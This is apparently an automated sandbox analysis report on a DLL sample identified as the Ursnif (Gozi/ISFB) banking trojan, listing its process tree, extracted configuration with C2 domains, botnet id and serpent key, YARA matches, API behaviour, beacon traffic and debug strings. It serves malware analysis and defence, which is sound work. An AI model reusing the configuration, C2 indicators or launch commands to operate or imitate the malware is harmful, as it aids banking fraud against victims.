Play interactive tour

Edit tour

Analysis Report nT5pUwoJSS.dll

Overview

General Information

Sample Name:	nT5pUwoJSS.dll
Analysis ID:	412166
MD5:	6fdbd25f7a84da80ee9d8577122c3291
SHA1:	39a52cbc48be934cf953d4699e8a1ea5ff53a5bf
SHA256:	4bf6e9d4067cb905631ddf7452ac571c4ed9800c7eb8fc7e51b688e1154f52e3
Tags:	dllGoziISFBUrsnif
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected Ursnif

Machine Learning detection for sample

Writes registry values via WMI

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

IP address seen in connection with other malware

One or more processes crash

PE file contains an invalid checksum

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

loaddll32.exe (PID: 6924 cmdline: loaddll32.exe 'C:\Users\user\Desktop\nT5pUwoJSS.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)

cmd.exe (PID: 6936 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\nT5pUwoJSS.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 6960 cmdline: rundll32.exe 'C:\Users\user\Desktop\nT5pUwoJSS.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6948 cmdline: rundll32.exe C:\Users\user\Desktop\nT5pUwoJSS.dll,Eithernothing MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6992 cmdline: rundll32.exe C:\Users\user\Desktop\nT5pUwoJSS.dll,Order MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 64 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6992 -s 892 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

rundll32.exe (PID: 7008 cmdline: rundll32.exe C:\Users\user\Desktop\nT5pUwoJSS.dll,Smileschool MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

iexplore.exe (PID: 5516 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 4556 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5516 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "KujE77ctKyR8x3/dODwZbEsxGmck+FW9384s5u0Kacw8y1gCN+8m2bfjJPovkn+Uzufcdfss+a43eI6oHR1KgWQmvEAO6LK8tJv+Wl7iCBPJP7eef8xKeXht/Mhk1PSj7mHnJ9lcqKMtTteEdSecVvMRtb/WSKVTFfHDva9My7AJ/NbXqHdzCG7znACswLxD", "c2_domain": ["outlook.com/login", "gmail.com", "worunekulo.club", "horunekulo.website"], "botnet": "8877", "server": "12", "serpent_key": "30218409ILPAJDUR", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000003.00000003.881584954.00000000050E8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.881638380.00000000050E8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.881444184.00000000050E8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.881614039.00000000050E8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.881537844.00000000050E8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.881689753.00000000050E8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.881502007.00000000050E8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.881360850.00000000050E8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: rundll32.exe PID: 6960	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 4 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 2.3.rundll32.exe.2c3a427.0.raw.unpack

Malware Configuration Extractor: Ursnif {"RSA Public Key": "KujE77ctKyR8x3/dODwZbEsxGmck+FW9384s5u0Kacw8y1gCN+8m2bfjJPovkn+Uzufcdfss+a43eI6oHR1KgWQmvEAO6LK8tJv+Wl7iCBPJP7eef8xKeXht/Mhk1PSj7mHnJ9lcqKMtTteEdSecVvMRtb/WSKVTFfHDva9My7AJ/NbXqHdzCG7znACswLxD", "c2_domain": ["outlook.com/login", "gmail.com", "worunekulo.club", "horunekulo.website"], "botnet": "8877", "server": "12", "serpent_key": "30218409ILPAJDUR", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Multi AV Scanner detection for submitted file

Show sources

Source: nT5pUwoJSS.dll

ReversingLabs: Detection: 21%

Machine Learning detection for sample

Show sources

Source: nT5pUwoJSS.dll

Joe Sandbox ML: detected

Source: nT5pUwoJSS.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source:	Binary string: WinTypes.pdb source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 0000000E.00000003.877150274.00000000053A1000.00000004.00000001.sdmp
Source:	Binary string: shlwapi.pdb+ source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: sfc_os.pdb source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 0000000E.00000003.877169719.00000000054B2000.00000004.00000040.sdmp
Source:	Binary string: CoreMessaging.pdb_ source: WerFault.exe, 0000000E.00000003.877259368.00000000054C3000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 0000000E.00000003.877150274.00000000053A1000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000E.00000003.877231767.00000000054B0000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 0000000E.00000003.871565860.00000000032AE000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 0000000E.00000003.877239660.00000000054B5000.00000004.00000040.sdmp
Source:	Binary string: CoreMessaging.pdb source: WerFault.exe, 0000000E.00000003.877259368.00000000054C3000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 0000000E.00000003.877150274.00000000053A1000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: TextInputFramework.pdb4h source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 0000000E.00000003.877239660.00000000054B5000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdbk source: WerFault.exe, 0000000E.00000003.877169719.00000000054B2000.00000004.00000040.sdmp
Source:	Binary string: ntmarta.pdb source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 0000000E.00000003.877169719.00000000054B2000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 0000000E.00000003.877150274.00000000053A1000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: CoreUIComponents.pdb source: WerFault.exe, 0000000E.00000003.877259368.00000000054C3000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb source: WerFault.exe, 0000000E.00000003.877231767.00000000054B0000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 0000000E.00000003.877150274.00000000053A1000.00000004.00000001.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: imagehlp.pdb source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdb source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: c:\Tube-meet\585\straight\lift\38_Claim\Tail.pdb source: loaddll32.exe, 00000000.00000002.910074848.000000006D4C9000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.911410296.000000006D4C9000.00000002.00020000.sdmp, nT5pUwoJSS.dll
Source:	Binary string: shcore.pdbk source: WerFault.exe, 0000000E.00000003.877239660.00000000054B5000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 0000000E.00000003.877150274.00000000053A1000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdbk source: WerFault.exe, 0000000E.00000003.877239660.00000000054B5000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb4a source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdbk source: WerFault.exe, 0000000E.00000003.877239660.00000000054B5000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdbk source: WerFault.exe, 0000000E.00000003.877169719.00000000054B2000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdb source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: TextInputFramework.pdb source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: AcLayers.pdb source: WerFault.exe, 0000000E.00000003.877150274.00000000053A1000.00000004.00000001.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000E.00000003.877231767.00000000054B0000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000E.00000003.877239660.00000000054B5000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000E.00000003.877231767.00000000054B0000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000E.00000003.877231767.00000000054B0000.00000004.00000040.sdmp
Source:	Binary string: rundll32.pdb source: WerFault.exe, 0000000E.00000003.877150274.00000000053A1000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 0000000E.00000003.877150274.00000000053A1000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 0000000E.00000003.877150274.00000000053A1000.00000004.00000001.sdmp
Source:	Binary string: mpr.pdb7` source: WerFault.exe, 0000000E.00000003.877231767.00000000054B0000.00000004.00000040.sdmp

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_02C84C3B RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,

3_2_02C84C3B

Source: Joe Sandbox View

IP Address: 40.97.153.146 40.97.153.146

Source: global traffic

HTTP traffic detected: GET /login/greed/KnH9H6Qjc_2F7/0e3_2F0_/2FRqQPyOKs18rFK5waVCGCI/jIBCBbgDdF/18TiURZdioL3eU4Wc/SUXArexakZ5d/R0lDxIGeIYj/c6FwtLcTr3EmEj/nbrTM1t_2BdTxREGmfFhs/_2BnTf5cT9dEAnPd/AFLbs3lARk22SMJ/POUz7dti2oyFXHE3_2/FgEVGs1vD/4LhoHpnAxyp/chUrsX.gfk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: outlook.comConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: outlook.com

Source: WerFault.exe, 0000000E.00000003.889153103.0000000005072000.00000004.00000001.sdmp	String found in binary or memory: http://crl.microsoft
Source: {4BD5DCDF-B312-11EB-90EB-ECF4BBEA1588}.dat.17.dr	String found in binary or memory: https://outlook.office365.com/login/greed/KnH9H6Qjc_2F7/0e3_2F0_/2FRqQPyOKs18rFK5waVCGCI/jIBCBbgDdF/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000003.00000003.881584954.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.881638380.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.881444184.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.881614039.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.881537844.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.881689753.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.881502007.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.881360850.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6960, type: MEMORY

Source: loaddll32.exe, 00000000.00000002.909557678.00000000012EB000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000003.00000003.881584954.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.881638380.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.881444184.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.881614039.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.881537844.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.881689753.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.881502007.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.881360850.00000000050E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6960, type: MEMORY

System Summary:

Writes registry values via WMI

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4823A5 NtQueryVirtualMemory,	0_2_6D4823A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D4815F1 GetProcAddress,NtCreateSection,memset,	3_2_6D4815F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D481F14 NtMapViewOfSection,	3_2_6D481F14
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D4823A5 NtQueryVirtualMemory,	3_2_6D4823A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_02C81168 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	3_2_02C81168
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_02C8B2F1 NtQueryVirtualMemory,	3_2_02C8B2F1

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D482184	0_2_6D482184
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4B8960	0_2_6D4B8960
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4C2153	0_2_6D4C2153
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D482184	3_2_6D482184
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_02C8B0CC	3_2_02C8B0CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_02C8696A	3_2_02C8696A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_02C81B6A	3_2_02C81B6A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D4B8960	3_2_6D4B8960
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D4C2153	3_2_6D4C2153

Source: C:\Windows\SysWOW64\rundll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6992 -s 892

Source: nT5pUwoJSS.dll

Binary or memory string: OriginalFilenameTail.dll0 vs nT5pUwoJSS.dll

Source: nT5pUwoJSS.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: nT5pUwoJSS.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal72.troj.winDLL@15/9@3/3

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_02C87F56 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

3_2_02C87F56

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{4BD5DCDD-B312-11EB-90EB-ECF4BBEA1588}.dat

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6992

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EB1.tmp

Jump to behavior

Source: nT5pUwoJSS.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\nT5pUwoJSS.dll,Eithernothing

Source: nT5pUwoJSS.dll

ReversingLabs: Detection: 21%

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\nT5pUwoJSS.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\nT5pUwoJSS.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\nT5pUwoJSS.dll,Eithernothing
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\nT5pUwoJSS.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\nT5pUwoJSS.dll,Order
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\nT5pUwoJSS.dll,Smileschool
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6992 -s 892
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5516 CREDAT:17410 /prefetch:2
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\nT5pUwoJSS.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\nT5pUwoJSS.dll,Eithernothing	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\nT5pUwoJSS.dll,Order	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\nT5pUwoJSS.dll,Smileschool	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\nT5pUwoJSS.dll',#1	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5516 CREDAT:17410 /prefetch:2	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: nT5pUwoJSS.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: nT5pUwoJSS.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: nT5pUwoJSS.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: nT5pUwoJSS.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: nT5pUwoJSS.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: nT5pUwoJSS.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: nT5pUwoJSS.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: WinTypes.pdb source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 0000000E.00000003.877150274.00000000053A1000.00000004.00000001.sdmp
Source:	Binary string: shlwapi.pdb+ source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: sfc_os.pdb source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 0000000E.00000003.877169719.00000000054B2000.00000004.00000040.sdmp
Source:	Binary string: CoreMessaging.pdb_ source: WerFault.exe, 0000000E.00000003.877259368.00000000054C3000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 0000000E.00000003.877150274.00000000053A1000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000E.00000003.877231767.00000000054B0000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 0000000E.00000003.871565860.00000000032AE000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 0000000E.00000003.877239660.00000000054B5000.00000004.00000040.sdmp
Source:	Binary string: CoreMessaging.pdb source: WerFault.exe, 0000000E.00000003.877259368.00000000054C3000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 0000000E.00000003.877150274.00000000053A1000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: TextInputFramework.pdb4h source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 0000000E.00000003.877239660.00000000054B5000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdbk source: WerFault.exe, 0000000E.00000003.877169719.00000000054B2000.00000004.00000040.sdmp
Source:	Binary string: ntmarta.pdb source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 0000000E.00000003.877169719.00000000054B2000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 0000000E.00000003.877150274.00000000053A1000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 0000000E.00000003.877178241.00000000054B8000.00000004.00000040.sdmp
